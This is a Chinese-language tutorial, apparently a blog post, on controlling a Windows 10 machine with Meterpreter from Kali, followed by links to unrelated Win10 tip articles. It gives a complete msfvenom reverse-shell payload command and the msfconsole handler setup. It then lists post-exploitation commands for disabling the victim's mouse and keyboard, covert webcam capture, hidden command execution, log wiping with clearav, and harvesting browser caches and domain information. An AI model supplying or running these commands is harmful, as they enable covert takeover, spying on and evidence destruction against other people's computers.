Meterpreter

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

查看kali和window的ip

在kali终端ifconfig，ip是192.168.0.103

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe

生成met.exe可执行的exe，并点击执行。

复制到win10主机，需要关闭window的防火墙

window点击exe前，kali需要进入msfconsole， 5555需要对应

msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.103
lhost => 192.168.0.103
msf5 exploit(multi/handler) > set lport 5555
lport => 5555

exploit命令发起攻击

在window桌面不小心放在重要的文件，直接cat查询

补充下，msfconsole的一些命令，只有控制了window，下面的命令都可以执行。

# 让他不能用鼠标
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘# 如果开了摄像头拍照
webcam摄像头命令
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互# clearav清除日志
clearav  #清除windows中的应用程序日志、系统日志、安全日志# 基本网络命令
ipconfig/ifconfig
netstat –ano
arp
getproxy   #查看代理信息
route   #查看路由# 信息收集的脚本位于：/usr/share/metasploit-framework/modules/post/windows/gather
/usr/share/metasploit-framework/modules/post/linux/gather# 信息收集的脚本较多，仅列几个常用的：run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

其实很弄别人是不行的，别人怎么会傻傻的关防火墙。

用kali的Meterpreter控制win10，可以偷看你的电脑的所有数据相关推荐

win10无法将设置应用到计算机,Win10提示应用无法在电脑上运行的原因及可行解决方法...
Win10提示应用无法在电脑上运行的原因及可行解决方法在Win10系统上安装软件,有时候会遇到系统提示此应用无法在你的电脑上运行.这问题有可能是软件和系统版本不匹配导致的,也有可能是兼容性问题导致的 ...
win10停止更新_新电脑到手第一件事，win10系统刷成win7，为何不直接预装win7？
很多人买到电脑的第一件事就是把win10系统换成win7,当然了,前提是买整机的情况下,而不是在第三方平台买的组装电脑.很多人都问,为什么现在win10系统越来越多,而win7明明还能用却不预装win ...
远程计算机的分辨率调整,手把手教你解决win10系统远程连接设置电脑分辨率的设置方法...
我们在使用电脑的过程中,有朋遇到win10系统远程连接设置电脑分辨率的问题固然处理起来也不难,然而还是有一些小伙伴不明白win10系统远程连接设置电脑分辨率应该怎样解决.因此就有很多小伙伴来向我咨询w ...
win10自带的删除电脑流氓弹窗软件工具怎么用
在使用电脑的时候,如果时不时就弹出一个弹窗软件广告的话,会比较影响我们的电脑使用体验,如果是每天都这样的话那就更糟心了.那么如何删除电脑流氓弹窗呢?下面小编就演示下win10自带的删除电脑流氓弹窗软件 ...
win10系统降级安装win7电脑系统教学
win10系统降级安装win7电脑系统的方法分享.如果你使用的是低版本的系统,那么进行系统升级是比较简单的.因为可以直接在系统中获取到新的系统来升级.那么怎么去将高级的电脑系统版本降低到低级,今天我们 ...
Win10、Win7系统，电脑蓝屏，什么原因怎么解决？一篇文章彻底解决！
Win10.Win7系统电脑蓝屏?什么原因?怎么办?如何解决?带着这些问题小编一一介绍下. Win10.Win7系统,电脑蓝屏怎么解决,电脑蓝屏什么原因标题随着使用电脑的时间增长,我们的电脑逐步出现 ...
计算机的资源管理器是电脑上的哪个图标,Win10资源管理器中“此电脑”光驱图标不见了怎么办？解决方法...
在Windows10正式版系统中,有些用户发现资源管理器中"这台电脑/此电脑"的光驱图标有时会出现突然消失的情况,光驱本身也无法使用.而在进入设备管理器后发现,光驱被标注了叹号&q ...
用户即将一分钟后关闭计算机,Win10开机提示“你的电脑将在一分钟后自动重启”怎么办？...
Win10开机提示"你的电脑将在一分钟后自动重启"怎么办?最近一位用户又遇到了开机问题,该用户在开机后总是提示"你的电脑将在一分钟后自动重启,Windows遇到问题并且需 ...
win10浏览器不能联网，电脑上其他软件可以联网
win10浏览器不能联网,电脑上其他软件可以使用解决方案: 首先找到网络和共享中心,右击左下角网络图标->打开"网络与Internet"设置->(状态中的)网络和共享 ...

用kali的Meterpreter控制win10，可以偷看你的电脑的所有数据

Meterpreter

用kali的Meterpreter控制win10，可以偷看你的电脑的所有数据相关推荐

最新文章

热门文章